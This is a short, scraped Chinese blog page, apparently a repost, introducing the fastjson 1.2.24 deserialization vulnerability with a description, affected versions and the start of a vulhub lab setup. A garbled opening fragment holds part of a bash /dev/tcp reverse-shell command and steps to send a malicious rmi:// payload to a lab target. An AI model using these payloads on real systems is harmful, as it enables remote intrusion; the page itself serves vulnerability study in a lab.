& /dev/tcp/192.168.1.3/5555 0>&1)1、kali(192.168.1.3)作为用户,访问目标机192.168.1.10:8090,并提交恶意数据rmi://192.168.1.3:6666。抓包修改请求方法为POST,最下面空一行添加{"name":"Cwillchris", "age":20},即可更新服务端的信息。_fas">
当前位置:   article > 正文

fastjson1.2.24 反序列化漏洞原理、环境搭建、利用图_fastjson 1.2.24 环境包

fastjson 1.2.24 环境包

一 、漏洞描述

fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。

受影响版本

fastjson <= 1.2.24

实验所需:

目标机:192.168.1.10

攻击机:192.168.1.3

二、 环境搭建docker-compose,vulhub(在目标机192.168.1.10)

搭建教程:https://blog.csdn.net/weixin_59679023/art

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/weixin_40725706/article/detail/923127
推荐阅读
相关标签
  

闽ICP备14008679号